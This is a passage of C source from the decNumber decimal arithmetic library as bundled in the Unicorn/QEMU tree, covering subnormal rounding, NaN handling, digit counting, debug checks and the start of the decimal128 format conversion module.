may need to be rounded) */ /* set is the context [used for the rounding mode] */ /* residue is any pending residue */ /* status contains the current status to be updated */ /* */ /* If subset mode, set result to zero and set Underflow flags. */ /* */ /* Value may be zero with a low exponent; this does not set Subnormal */ /* but the exponent will be clamped to Etiny. */ /* */ /* Otherwise ensure exponent is not out of range, and round as */ /* necessary. Underflow is set if the result is Inexact. */ /* ------------------------------------------------------------------ */ static void decSetSubnormal(decNumber *dn, decContext *set, Int *residue, uInt *status) { decContext workset; /* work */ Int etiny, adjust; /* .. 
*/
  #if DECSUBSET
  /* simple set to zero and 'hard underflow' for subset */
  if (!set->extended) {
    decNumberZero(dn);
    /* always full underflow */
    *status|=DEC_Underflow | DEC_Subnormal | DEC_Inexact | DEC_Rounded;
    return;
    }
  #endif

  /* Full arithmetic -- allow subnormals, rounded to minimum exponent */
  /* (Etiny) if needed */
  etiny=set->emin-(set->digits-1);  /* smallest allowed exponent */

  if ISZERO(dn) {                   /* value is zero */
    /* residue can never be non-zero here */
    #if DECCHECK
    if (*residue!=0) {
      printf("++ Subnormal 0 residue %ld\n", (LI)*residue);
      *status|=DEC_Invalid_operation;
      }
    #endif
    if (dn->exponent<etiny) {       /* clamp required */
      dn->exponent=etiny;
      *status|=DEC_Clamped;
      }
    return;
    }

  *status|=DEC_Subnormal;           /* have a non-zero subnormal */
  adjust=etiny-dn->exponent;        /* calculate digits to remove */
  if (adjust<=0) {                  /* not out of range; unrounded */
    /* residue can never be non-zero here, except in the Nmin-residue */
    /* case (which is a subnormal result), so can take fast-path here */
    /* it may already be inexact (from setting the coefficient) */
    if (*status&DEC_Inexact) *status|=DEC_Underflow;
    return;
    }

  /* adjust>0, so need to rescale the result so exponent becomes Etiny */
  /* [this code is similar to that in rescale] */
  workset=*set;                     /* clone rounding, etc. */
  workset.digits=dn->digits-adjust; /* set requested length */
  workset.emin-=adjust;             /* and adjust emin to match */
  /* [note that the latter can be <1, here, similar to Rescale case] */
  decSetCoeff(dn, &workset, dn->lsu, dn->digits, residue, status);
  decApplyRound(dn, &workset, *residue, status);

  /* Use 754R/854 default rule: Underflow is set iff Inexact */
  /* [independent of whether trapped] */
  if (*status&DEC_Inexact) *status|=DEC_Underflow;

  /* if rounded up a 999s case, exponent will be off by one; adjust */
  /* back if so [it will fit, because it was shortened earlier] */
  if (dn->exponent>etiny) {
    dn->digits=decShiftToMost(dn->lsu, dn->digits, 1);
    dn->exponent--;                 /* (re)adjust the exponent. */
    }

  /* if rounded to zero, it is by definition clamped... */
  if (ISZERO(dn)) *status|=DEC_Clamped;
  } /* decSetSubnormal */

/* ------------------------------------------------------------------ */
/* decCheckMath -- check entry conditions for a math function */
/* */
/* This checks the context and the operand */
/* */
/* rhs is the operand to check */
/* set is the context to check */
/* status is unchanged if both are good */
/* */
/* returns non-zero if status is changed, 0 otherwise */
/* */
/* Restrictions enforced: */
/* */
/* digits, emax, and -emin in the context must be less than */
/* DEC_MAX_MATH (999999), and A must be within these bounds if */
/* non-zero. Invalid_operation is set in the status if a */
/* restriction is violated.
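*/
/* [Editor's illustrative note -- not part of the original source] */
/* For example, an operand of 1E+1000000 has exponent+digits = */
/* 1000001 > DEC_MAX_MATH+1, so DEC_Invalid_operation is set even */
/* when the context itself is within bounds. */
/*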
*/ /* ------------------------------------------------------------------ */ static uInt decCheckMath(const decNumber *rhs, decContext *set, uInt *status) { uInt save=*status; /* record */ if (set->digits>DEC_MAX_MATH || set->emax>DEC_MAX_MATH || -set->emin>DEC_MAX_MATH) *status|=DEC_Invalid_context; else if ((rhs->digits>DEC_MAX_MATH || rhs->exponent+rhs->digits>DEC_MAX_MATH+1 || rhs->exponent+rhs->digits<2*(1-DEC_MAX_MATH)) && !ISZERO(rhs)) *status|=DEC_Invalid_operation; return (*status!=save); } /* decCheckMath */ /* ------------------------------------------------------------------ */ /* decGetInt -- get integer from a number */ /* */ /* dn is the number [which will not be altered] */ /* */ /* returns one of: */ /* BADINT if there is a non-zero fraction */ /* the converted integer */ /* BIGEVEN if the integer is even and magnitude > 2*10**9 */ /* BIGODD if the integer is odd and magnitude > 2*10**9 */ /* */ /* This checks and gets a whole number from the input decNumber. */ /* The sign can be determined from dn by the caller when BIGEVEN or */ /* BIGODD is returned. */ /* ------------------------------------------------------------------ */ static Int decGetInt(const decNumber *dn) { Int theInt; /* result accumulator */ const Unit *up; /* work */ Int got; /* digits (real or not) processed */ Int ilength=dn->digits+dn->exponent; /* integral length */ Flag neg=decNumberIsNegative(dn); /* 1 if -ve */ /* The number must be an integer that fits in 10 digits */ /* Assert, here, that 10 is enough for any rescale Etiny */ #if DEC_MAX_EMAX > 999999999 #error GetInt may need updating [for Emax] #endif #if DEC_MIN_EMIN < -999999999 #error GetInt may need updating [for Emin] #endif if (ISZERO(dn)) return 0; /* zeros are OK, with any exponent */ up=dn->lsu; /* ready for lsu */ theInt=0; /* ready to accumulate */ if (dn->exponent>=0) { /* relatively easy */ /* no fractional part [usual]; allow for positive exponent */ got=dn->exponent; } else { /* -ve exponent; some fractional part to check and discard */ Int count=-dn->exponent; /* digits to discard */ /* spin up whole units until reach the Unit with the unit digit */ for (; count>=DECDPUN; up++) { if (*up!=0) return BADINT; /* non-zero Unit to discard */ count-=DECDPUN; } if (count==0) got=0; /* [a multiple of DECDPUN] */ else { /* [not multiple of DECDPUN] */ Int rem; /* work */ /* slice off fraction digits and check for non-zero */ #if DECDPUN<=4 theInt=QUOT10(*up, count); rem=*up-theInt*powers[count]; #else rem=*up%powers[count]; /* slice off discards */ theInt=*up/powers[count]; #endif if (rem!=0) return BADINT; /* non-zero fraction */ /* it looks good */ got=DECDPUN-count; /* number of digits so far */ up++; /* ready for next */ } } /* now it's known there's no fractional part */ /* tricky code now, to accumulate up to 9.3 digits */ if (got==0) {theInt=*up; got+=DECDPUN; up++;} /* ensure lsu is there */ if (ilength<11) { Int save=theInt; /* collect any remaining unit(s) */ for (; got<ilength; up++) { theInt+=*up*powers[got]; got+=DECDPUN; } if (ilength==10) { /* need to check for wrap */ if (theInt/(Int)powers[got-DECDPUN]!=(Int)*(up-1)) ilength=11; /* [that test also disallows the BADINT result case] */ else if (neg && theInt>1999999997) ilength=11; else if (!neg && theInt>999999999) ilength=11; if (ilength==11) theInt=save; /* restore correct low bit */ } } if (ilength>10) { /* too big */ if (theInt&1) return BIGODD; /* bottom bit 1 */ return BIGEVEN; /* bottom bit 0 */ } if (neg) theInt=-theInt; /* apply sign */ return theInt; } /* 
decGetInt */ /* ------------------------------------------------------------------ */ /* decDecap -- decapitate the coefficient of a number */ /* */ /* dn is the number to be decapitated */ /* drop is the number of digits to be removed from the left of dn; */ /* this must be <= dn->digits (if equal, the coefficient is */ /* set to 0) */ /* */ /* Returns dn; dn->digits will be <= the initial digits less drop */ /* (after removing drop digits there may be leading zero digits */ /* which will also be removed). Only dn->lsu and dn->digits change. */ /* ------------------------------------------------------------------ */ static decNumber *decDecap(decNumber *dn, Int drop) { Unit *msu; /* -> target cut point */ Int cut; /* work */ if (drop>=dn->digits) { /* losing the whole thing */ #if DECCHECK if (drop>dn->digits) printf("decDecap called with drop>digits [%ld>%ld]\n", (LI)drop, (LI)dn->digits); #endif dn->lsu[0]=0; dn->digits=1; return dn; } msu=dn->lsu+D2U(dn->digits-drop)-1; /* -> likely msu */ cut=MSUDIGITS(dn->digits-drop); /* digits to be in use in msu */ if (cut!=DECDPUN) *msu%=powers[cut]; /* clear left digits */ /* that may have left leading zero digits, so do a proper count... */ dn->digits=decGetDigits(dn->lsu, msu-dn->lsu+1); return dn; } /* decDecap */ /* ------------------------------------------------------------------ */ /* decBiStr -- compare string with pairwise options */ /* */ /* targ is the string to compare */ /* str1 is one of the strings to compare against (length may be 0) */ /* str2 is the other; it must be the same length as str1 */ /* */ /* returns 1 if strings compare equal, (that is, it is the same */ /* length as str1 and str2, and each character of targ is in either */ /* str1 or str2 in the corresponding position), or 0 otherwise */ /* */ /* This is used for generic caseless compare, including the awkward */ /* case of the Turkish dotted and dotless Is. Use as (for example): */ /* if (decBiStr(test, "mike", "MIKE")) ... */ /* ------------------------------------------------------------------ */ static Flag decBiStr(const char *targ, const char *str1, const char *str2) { for (;;targ++, str1++, str2++) { if (*targ!=*str1 && *targ!=*str2) return 0; /* *targ has a match in one (or both, if terminator) */ if (*targ=='\0') break; } /* forever */ return 1; } /* decBiStr */ /* ------------------------------------------------------------------ */ /* decNaNs -- handle NaN operand or operands */ /* */ /* res is the result number */ /* lhs is the first operand */ /* rhs is the second operand, or NULL if none */ /* context is used to limit payload length */ /* status contains the current status */ /* returns res in case convenient */ /* */ /* Called when one or both operands is a NaN, and propagates the */ /* appropriate result to res. When an sNaN is found, it is changed */ /* to a qNaN and Invalid operation is set. 
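*/
/* [Editor's illustrative note -- not part of the original source] */
/* For example, with lhs=sNaN123 and rhs=NaN456 the sNaN operand */
/* takes precedence: the result is the quiet NaN123 (payload kept, */
/* sNaN bit cleared) and DEC_Invalid_operation is set; with two */
/* quiet NaNs the lhs payload is propagated (truncated if longer */
/* than set->digits). */
/*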
*/ /* ------------------------------------------------------------------ */ static decNumber * decNaNs(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, uInt *status) { /* This decision tree ends up with LHS being the source pointer, */ /* and status updated if need be */ if (lhs->bits & DECSNAN) *status|=DEC_Invalid_operation | DEC_sNaN; else if (rhs==NULL); else if (rhs->bits & DECSNAN) { lhs=rhs; *status|=DEC_Invalid_operation | DEC_sNaN; } else if (lhs->bits & DECNAN); else lhs=rhs; /* propagate the payload */ if (lhs->digits<=set->digits) decNumberCopy(res, lhs); /* easy */ else { /* too long */ const Unit *ul; Unit *ur, *uresp1; /* copy safe number of units, then decapitate */ res->bits=lhs->bits; /* need sign etc. */ uresp1=res->lsu+D2U(set->digits); for (ur=res->lsu, ul=lhs->lsu; ur<uresp1; ur++, ul++) *ur=*ul; res->digits=D2U(set->digits)*DECDPUN; /* maybe still too long */ if (res->digits>set->digits) decDecap(res, res->digits-set->digits); } res->bits&=~DECSNAN; /* convert any sNaN to NaN, while */ res->bits|=DECNAN; /* .. preserving sign */ res->exponent=0; /* clean exponent */ /* [coefficient was copied/decapitated] */ return res; } /* decNaNs */ /* ------------------------------------------------------------------ */ /* decStatus -- apply non-zero status */ /* */ /* dn is the number to set if error */ /* status contains the current status (not yet in context) */ /* set is the context */ /* */ /* If the status is an error status, the number is set to a NaN, */ /* unless the error was an overflow, divide-by-zero, or underflow, */ /* in which case the number will have already been set. */ /* */ /* The context status is then updated with the new status. Note that */ /* this may raise a signal, so control may never return from this */ /* routine (hence resources must be recovered before it is called). */ /* ------------------------------------------------------------------ */ static void decStatus(decNumber *dn, uInt status, decContext *set) { if (status & DEC_NaNs) { /* error status -> NaN */ /* if cause was an sNaN, clear and propagate [NaN is already set up] */ if (status & DEC_sNaN) status&=~DEC_sNaN; else { decNumberZero(dn); /* other error: clean throughout */ dn->bits=DECNAN; /* and make a quiet NaN */ } } decContextSetStatus(set, status); /* [may not return] */ return; } /* decStatus */ /* ------------------------------------------------------------------ */ /* decGetDigits -- count digits in a Units array */ /* */ /* uar is the Unit array holding the number (this is often an */ /* accumulator of some sort) */ /* len is the length of the array in units [>=1] */ /* */ /* returns the number of (significant) digits in the array */ /* */ /* All leading zeros are excluded, except the last if the array has */ /* only zero Units. */ /* ------------------------------------------------------------------ */ /* This may be called twice during some operations. 
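*/
/* [Editor's illustrative note -- not part of the original source] */
/* For example, with DECDPUN=4 the two-unit array {0000, 0012} */
/* (lsu first) holds the value 120000, for which this returns 6: */
/* four digits from the low unit plus the two significant digits */
/* of the msu. */
/*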
*/ static Int decGetDigits(Unit *uar, Int len) { Unit *up=uar+(len-1); /* -> msu */ Int digits=(len-1)*DECDPUN+1; /* possible digits excluding msu */ #if DECDPUN>4 uInt const *pow; /* work */ #endif /* (at least 1 in final msu) */ #if DECCHECK if (len<1) printf("decGetDigits called with len<1 [%ld]\n", (LI)len); #endif for (; up>=uar; up--) { if (*up==0) { /* unit is all 0s */ if (digits==1) break; /* a zero has one digit */ digits-=DECDPUN; /* adjust for 0 unit */ continue;} /* found the first (most significant) non-zero Unit */ #if DECDPUN>1 /* not done yet */ if (*up<10) break; /* is 1-9 */ digits++; #if DECDPUN>2 /* not done yet */ if (*up<100) break; /* is 10-99 */ digits++; #if DECDPUN>3 /* not done yet */ if (*up<1000) break; /* is 100-999 */ digits++; #if DECDPUN>4 /* count the rest ... */ for (pow=&powers[4]; *up>=*pow; pow++) digits++; #endif #endif #endif #endif break; } /* up */ return digits; } /* decGetDigits */ #if DECTRACE | DECCHECK /* ------------------------------------------------------------------ */ /* decNumberShow -- display a number [debug aid] */ /* dn is the number to show */ /* */ /* Shows: sign, exponent, coefficient (msu first), digits */ /* or: sign, special-value */ /* ------------------------------------------------------------------ */ /* this is public so other modules can use it */ void decNumberShow(const decNumber *dn) { const Unit *up; /* work */ uInt u, d; /* .. */ Int cut; /* .. */ char isign='+'; /* main sign */ if (dn==NULL) { printf("NULL\n"); return;} if (decNumberIsNegative(dn)) isign='-'; printf(" >> %c ", isign); if (dn->bits&DECSPECIAL) { /* Is a special value */ if (decNumberIsInfinite(dn)) printf("Infinity"); else { /* a NaN */ if (dn->bits&DECSNAN) printf("sNaN"); /* signalling NaN */ else printf("NaN"); } /* if coefficient and exponent are 0, no more to do */ if (dn->exponent==0 && dn->digits==1 && *dn->lsu==0) { printf("\n"); return;} /* drop through to report other information */ printf(" "); } /* now carefully display the coefficient */ up=dn->lsu+D2U(dn->digits)-1; /* msu */ printf("%ld", (LI)*up); for (up=up-1; up>=dn->lsu; up--) { u=*up; printf(":"); for (cut=DECDPUN-1; cut>=0; cut--) { d=u/powers[cut]; u-=d*powers[cut]; printf("%ld", (LI)d); } /* cut */ } /* up */ if (dn->exponent!=0) { char esign='+'; if (dn->exponent<0) esign='-'; printf(" E%c%ld", esign, (LI)abs(dn->exponent)); } printf(" [%ld]\n", (LI)dn->digits); } /* decNumberShow */ #endif #if DECTRACE || DECCHECK /* ------------------------------------------------------------------ */ /* decDumpAr -- display a unit array [debug/check aid] */ /* name is a single-character tag name */ /* ar is the array to display */ /* len is the length of the array in Units */ /* ------------------------------------------------------------------ */ static void decDumpAr(char name, const Unit *ar, Int len) { Int i; const char *spec; #if DECDPUN==9 spec="%09d "; #elif DECDPUN==8 spec="%08d "; #elif DECDPUN==7 spec="%07d "; #elif DECDPUN==6 spec="%06d "; #elif DECDPUN==5 spec="%05d "; #elif DECDPUN==4 spec="%04d "; #elif DECDPUN==3 spec="%03d "; #elif DECDPUN==2 spec="%02d "; #else spec="%d "; #endif printf(" :%c: ", name); for (i=len-1; i>=0; i--) { if (i==len-1) printf("%ld ", (LI)ar[i]); else printf(spec, ar[i]); } printf("\n"); return;} #endif #if DECCHECK /* ------------------------------------------------------------------ */ /* decCheckOperands -- check operand(s) to a routine */ /* res is the result structure (not checked; it will be set to */ /* quiet NaN if error found (and it is 
not NULL)) */ /* lhs is the first operand (may be DECUNRESU) */ /* rhs is the second (may be DECUNUSED) */ /* set is the context (may be DECUNCONT) */ /* returns 0 if both operands, and the context are clean, or 1 */ /* otherwise (in which case the context will show an error, */ /* unless NULL). Note that res is not cleaned; caller should */ /* handle this so res=NULL case is safe. */ /* The caller is expected to abandon immediately if 1 is returned. */ /* ------------------------------------------------------------------ */ static Flag decCheckOperands(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { Flag bad=0; if (set==NULL) { /* oops; hopeless */ #if DECTRACE || DECVERB printf("Reference to context is NULL.\n"); #endif bad=1; return 1;} else if (set!=DECUNCONT && (set->digits<1 || set->round>=DEC_ROUND_MAX)) { bad=1; #if DECTRACE || DECVERB printf("Bad context [digits=%ld round=%ld].\n", (LI)set->digits, (LI)set->round); #endif } else { if (res==NULL) { bad=1; #if DECTRACE /* this one not DECVERB as standard tests include NULL */ printf("Reference to result is NULL.\n"); #endif } if (!bad && lhs!=DECUNUSED) bad=(decCheckNumber(lhs)); if (!bad && rhs!=DECUNUSED) bad=(decCheckNumber(rhs)); } if (bad) { if (set!=DECUNCONT) decContextSetStatus(set, DEC_Invalid_operation); if (res!=DECUNRESU && res!=NULL) { decNumberZero(res); res->bits=DECNAN; /* qNaN */ } } return bad; } /* decCheckOperands */ /* ------------------------------------------------------------------ */ /* decCheckNumber -- check a number */ /* dn is the number to check */ /* returns 0 if the number is clean, or 1 otherwise */ /* */ /* The number is considered valid if it could be a result from some */ /* operation in some valid context. */ /* ------------------------------------------------------------------ */ static Flag decCheckNumber(const decNumber *dn) { const Unit *up; /* work */ uInt maxuint; /* .. */ Int ae, d, digits; /* .. */ Int emin, emax; /* .. */ if (dn==NULL) { /* hopeless */ #if DECTRACE /* this one not DECVERB as standard tests include NULL */ printf("Reference to decNumber is NULL.\n"); #endif return 1;} /* check special values */ if (dn->bits & DECSPECIAL) { if (dn->exponent!=0) { #if DECTRACE || DECVERB printf("Exponent %ld (not 0) for a special value [%02x].\n", (LI)dn->exponent, dn->bits); #endif return 1;} /* 2003.09.08: NaNs may now have coefficients, so next tests Inf only */ if (decNumberIsInfinite(dn)) { if (dn->digits!=1) { #if DECTRACE || DECVERB printf("Digits %ld (not 1) for an infinity.\n", (LI)dn->digits); #endif return 1;} if (*dn->lsu!=0) { #if DECTRACE || DECVERB printf("LSU %ld (not 0) for an infinity.\n", (LI)*dn->lsu); #endif decDumpAr('I', dn->lsu, D2U(dn->digits)); return 1;} } /* Inf */ /* 2002.12.26: negative NaNs can now appear through proposed IEEE */ /* concrete formats (decimal64, etc.). 
*/ return 0; } /* check the coefficient */ if (dn->digits<1 || dn->digits>DECNUMMAXP) { #if DECTRACE || DECVERB printf("Digits %ld in number.\n", (LI)dn->digits); #endif return 1;} d=dn->digits; for (up=dn->lsu; d>0; up++) { if (d>DECDPUN) maxuint=DECDPUNMAX; else { /* reached the msu */ maxuint=powers[d]-1; if (dn->digits>1 && *up<powers[d-1]) { #if DECTRACE || DECVERB printf("Leading 0 in number.\n"); decNumberShow(dn); #endif return 1;} } if (*up>maxuint) { #if DECTRACE || DECVERB printf("Bad Unit [%08lx] in %ld-digit number at offset %ld [maxuint %ld].\n", (LI)*up, (LI)dn->digits, (LI)(up-dn->lsu), (LI)maxuint); #endif return 1;} d-=DECDPUN; } /* check the exponent. Note that input operands can have exponents */ /* which are out of the set->emin/set->emax and set->digits range */ /* (just as they can have more digits than set->digits). */ ae=dn->exponent+dn->digits-1; /* adjusted exponent */ emax=DECNUMMAXE; emin=DECNUMMINE; digits=DECNUMMAXP; if (ae<emin-(digits-1)) { #if DECTRACE || DECVERB printf("Adjusted exponent underflow [%ld].\n", (LI)ae); decNumberShow(dn); #endif return 1;} if (ae>+emax) { #if DECTRACE || DECVERB printf("Adjusted exponent overflow [%ld].\n", (LI)ae); decNumberShow(dn); #endif return 1;} return 0; /* it's OK */ } /* decCheckNumber */ /* ------------------------------------------------------------------ */ /* decCheckInexact -- check a normal finite inexact result has digits */ /* dn is the number to check */ /* set is the context (for status and precision) */ /* sets Invalid operation, etc., if some digits are missing */ /* [this check is not made for DECSUBSET compilation or when */ /* subnormal is not set] */ /* ------------------------------------------------------------------ */ static void decCheckInexact(const decNumber *dn, decContext *set) { #if !DECSUBSET && DECEXTFLAG if ((set->status & (DEC_Inexact|DEC_Subnormal))==DEC_Inexact && (set->digits!=dn->digits) && !(dn->bits & DECSPECIAL)) { #if DECTRACE || DECVERB printf("Insufficient digits [%ld] on normal Inexact result.\n", (LI)dn->digits); decNumberShow(dn); #endif decContextSetStatus(set, DEC_Invalid_operation); } #else /* next is a noop for quiet compiler */ if (dn!=NULL && dn->digits==0) set->status|=DEC_Invalid_operation; #endif return; } /* decCheckInexact */ #endif #if DECALLOC #undef malloc #undef free /* ------------------------------------------------------------------ */ /* decMalloc -- accountable allocation routine */ /* n is the number of bytes to allocate */ /* */ /* Semantics is the same as the stdlib malloc routine, but bytes */ /* allocated are accounted for globally, and corruption fences are */ /* added before and after the 'actual' storage. */ /* ------------------------------------------------------------------ */ /* This routine allocates storage with an extra twelve bytes; 8 are */ /* at the start and hold: */ /* 0-3 the original length requested */ /* 4-7 buffer corruption detection fence (DECFENCE, x4) */ /* The 4 bytes at the end also hold a corruption fence (DECFENCE, x4) */ /* ------------------------------------------------------------------ */ static void *decMalloc(size_t n) { uInt size=n+12; /* true size */ void *alloc; /* -> allocated storage */ uInt *j; /* work */ uByte *b, *b0; /* .. 
*/
  alloc=malloc(size);                /* -> allocated storage */
  if (alloc==NULL) return NULL;      /* out of storage */
  b0=(uByte *)alloc;                 /* as bytes */
  decAllocBytes+=n;                  /* account for storage */
  j=(uInt *)alloc;                   /* -> first four bytes */
  *j=n;                              /* save n */
  /* printf(" alloc ++ dAB: %ld (%d)\n", decAllocBytes, n); */
  for (b=b0+4; b<b0+8; b++) *b=DECFENCE;
  for (b=b0+n+8; b<b0+n+12; b++) *b=DECFENCE;
  return b0+8;                       /* -> play area */
  } /* decMalloc */

/* ------------------------------------------------------------------ */
/* decFree -- accountable free routine                                */
/*   alloc is the storage to free                                     */
/*                                                                    */
/* Semantics is the same as the stdlib free routine, except that      */
/* the global storage accounting is updated and the fences are        */
/* checked to ensure that no routine has written 'out of bounds'.     */
/* ------------------------------------------------------------------ */
/* This routine first checks that the fences have not been corrupted. */
/* It then frees the storage using the 'true' storage address (that   */
/* is, offset by 8).                                                  */
/* ------------------------------------------------------------------ */
static void decFree(void *alloc) {
  uInt *j, n;                        /* pointer, original length */
  uByte *b, *b0;                     /* work */

  if (alloc==NULL) return;           /* allowed; it's a nop */
  b0=(uByte *)alloc;                 /* as bytes */
  b0-=8;                             /* -> true start of storage */
  j=(uInt *)b0;                      /* -> first four bytes */
  n=*j;                              /* lift */
  for (b=b0+4; b<b0+8; b++) if (*b!=DECFENCE)
    printf("=== Corrupt byte [%02x] at offset %d from %ld ===\n", *b,
           b-b0-8, (Int)b0);
  for (b=b0+n+8; b<b0+n+12; b++) if (*b!=DECFENCE)
    printf("=== Corrupt byte [%02x] at offset +%d from %ld, n=%ld ===\n", *b,
           b-b0-8, (Int)b0, n);
  free(b0);                          /* drop the storage */
  decAllocBytes-=n;                  /* account for storage */
  /* printf(" free -- dAB: %d (%d)\n", decAllocBytes, -n); */
  } /* decFree */
#define malloc(a) decMalloc(a)
#define free(a) decFree(a)
#endif
unicorn-2.1.1/qemu/libdecnumber/dpd/ 0000775 0000000 0000000 00000000000 14675241067 0017355 5 ustar 00root root
unicorn-2.1.1/qemu/libdecnumber/dpd/decimal128.c 0000664 0000000 0000000 00000053544 14675241067 0021365 0 ustar 00root root
/* Decimal 128-bit format module for the decNumber C Library.
   Copyright (C) 2005, 2007 Free Software Foundation, Inc.
   Contributed by IBM Corporation.  Author Mike Cowlishaw.

   This file is part of GCC.

   GCC is free software; you can redistribute it and/or modify it under
   the terms of the GNU General Public License as published by the Free
   Software Foundation; either version 2, or (at your option) any later
   version.
In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 128-bit format module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for decimal128 format numbers. */ /* Conversions are supplied to and from decNumber and String. */ /* */ /* This is used when decNumber provides operations, either for all */ /* operations or as a proxy between decNumber and decSingle. */ /* */ /* Error handling is the same as decNumber (qv.). */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #define DECNUMDIGITS 34 /* make decNumbers with space for 34 */ #include "libdecnumber/decNumber.h" #include "libdecnumber/decNumberLocal.h" #include "libdecnumber/dpd/decimal128.h" /* Utility routines and tables [in decimal64.c] */ extern const uInt COMBEXP[32], COMBMSD[32]; extern const uByte BIN2CHAR[4001]; extern void decDigitsFromDPD(decNumber *, const uInt *, Int); extern void decDigitsToDPD(const decNumber *, uInt *, Int); #if DECTRACE || DECCHECK void decimal128Show(const decimal128 *); /* for debug */ extern void decNumberShow(const decNumber *); /* .. */ #endif /* Useful macro */ /* Clear a structure (e.g., a decNumber) */ #define DEC_clear(d) memset(d, 0, sizeof(*d)) /* ------------------------------------------------------------------ */ /* decimal128FromNumber -- convert decNumber to decimal128 */ /* */ /* ds is the target decimal128 */ /* dn is the source number (assumed valid) */ /* set is the context, used only for reporting errors */ /* */ /* The set argument is used only for status reporting and for the */ /* rounding mode (used if the coefficient is more than DECIMAL128_Pmax*/ /* digits or an overflow is detected). If the exponent is out of the */ /* valid range then Overflow or Underflow will be raised. */ /* After Underflow a subnormal result is possible. */ /* */ /* DEC_Clamped is set if the number has to be 'folded down' to fit, */ /* by reducing its exponent and multiplying the coefficient by a */ /* power of ten, or if the exponent on a zero had to be clamped. */ /* ------------------------------------------------------------------ */ decimal128 * decimal128FromNumber(decimal128 *d128, const decNumber *dn, decContext *set) { uInt status=0; /* status accumulator */ Int ae; /* adjusted exponent */ decNumber dw; /* work */ decContext dc; /* .. */ uInt *pu; /* .. */ uInt comb, exp; /* .. 
*/ uInt targar[4]={0,0,0,0}; /* target 128-bit */ #define targhi targar[3] /* name the word with the sign */ #define targmh targar[2] /* name the words */ #define targml targar[1] /* .. */ #define targlo targar[0] /* .. */ /* If the number has too many digits, or the exponent could be */ /* out of range then reduce the number under the appropriate */ /* constraints. This could push the number to Infinity or zero, */ /* so this check and rounding must be done before generating the */ /* decimal128] */ ae=dn->exponent+dn->digits-1; /* [0 if special] */ if (dn->digits>DECIMAL128_Pmax /* too many digits */ || ae>DECIMAL128_Emax /* likely overflow */ || ae<DECIMAL128_Emin) { /* likely underflow */ decContextDefault(&dc, DEC_INIT_DECIMAL128); /* [no traps] */ dc.round=set->round; /* use supplied rounding */ decNumberPlus(&dw, dn, &dc); /* (round and check) */ /* [this changes -0 to 0, so enforce the sign...] */ dw.bits|=dn->bits&DECNEG; status=dc.status; /* save status */ dn=&dw; /* use the work number */ } /* maybe out of range */ if (dn->bits&DECSPECIAL) { /* a special value */ if (dn->bits&DECINF) targhi=DECIMAL_Inf<<24; else { /* sNaN or qNaN */ if ((*dn->lsu!=0 || dn->digits>1) /* non-zero coefficient */ && (dn->digits<DECIMAL128_Pmax)) { /* coefficient fits */ decDigitsToDPD(dn, targar, 0); } if (dn->bits&DECNAN) targhi|=DECIMAL_NaN<<24; else targhi|=DECIMAL_sNaN<<24; } /* a NaN */ } /* special */ else { /* is finite */ if (decNumberIsZero(dn)) { /* is a zero */ /* set and clamp exponent */ if (dn->exponent<-DECIMAL128_Bias) { exp=0; /* low clamp */ status|=DEC_Clamped; } else { exp=dn->exponent+DECIMAL128_Bias; /* bias exponent */ if (exp>DECIMAL128_Ehigh) { /* top clamp */ exp=DECIMAL128_Ehigh; status|=DEC_Clamped; } } comb=(exp>>9) & 0x18; /* msd=0, exp top 2 bits .. */ } else { /* non-zero finite number */ uInt msd; /* work */ Int pad=0; /* coefficient pad digits */ /* the dn is known to fit, but it may need to be padded */ exp=(uInt)(dn->exponent+DECIMAL128_Bias); /* bias exponent */ if (exp>DECIMAL128_Ehigh) { /* fold-down case */ pad=exp-DECIMAL128_Ehigh; exp=DECIMAL128_Ehigh; /* [to maximum] */ status|=DEC_Clamped; } /* [fastpath for common case is not a win, here] */ decDigitsToDPD(dn, targar, pad); /* save and clear the top digit */ msd=targhi>>14; targhi&=0x00003fff; /* create the combination field */ if (msd>=8) comb=0x18 | ((exp>>11) & 0x06) | (msd & 0x01); else comb=((exp>>9) & 0x18) | msd; } targhi|=comb<<26; /* add combination field .. */ targhi|=(exp&0xfff)<<14; /* .. and exponent continuation */ } /* finite */ if (dn->bits&DECNEG) targhi|=0x80000000; /* add sign bit */ /* now write to storage; this is endian */ pu=(uInt *)d128->bytes; /* overlay */ if (DECLITEND) { pu[0]=targlo; /* directly store the low int */ pu[1]=targml; /* then the mid-low */ pu[2]=targmh; /* then the mid-high */ pu[3]=targhi; /* then the high int */ } else { pu[0]=targhi; /* directly store the high int */ pu[1]=targmh; /* then the mid-high */ pu[2]=targml; /* then the mid-low */ pu[3]=targlo; /* then the low int */ } if (status!=0) decContextSetStatus(set, status); /* pass on status */ /* decimal128Show(d128); */ return d128; } /* decimal128FromNumber */ /* ------------------------------------------------------------------ */ /* decimal128ToNumber -- convert decimal128 to decNumber */ /* d128 is the source decimal128 */ /* dn is the target number, with appropriate space */ /* No error is possible. 
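/* ------------------------------------------------------------------ */
/* [Editor's worked example, not library code] The combination field  */
/* built above packs the top two bits of the 14-bit biased exponent   */
/* (ee) with the most-significant digit.  Digits 0-7 use ee|msd(3);   */
/* digits 8-9 need only one bit, so they use the escape form 11|ee|m: */
/*                                                                    */
/*   msd=5, exponent top bits 10: ((exp>>9)&0x18)|5           = 10101 */
/*   msd=9, exponent top bits 10: 0x18|((exp>>11)&0x06)|(9&1) = 11101 */
/*                                                                    */
/* The remaining 12 exponent bits follow as the continuation field.   */
/* ------------------------------------------------------------------ */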
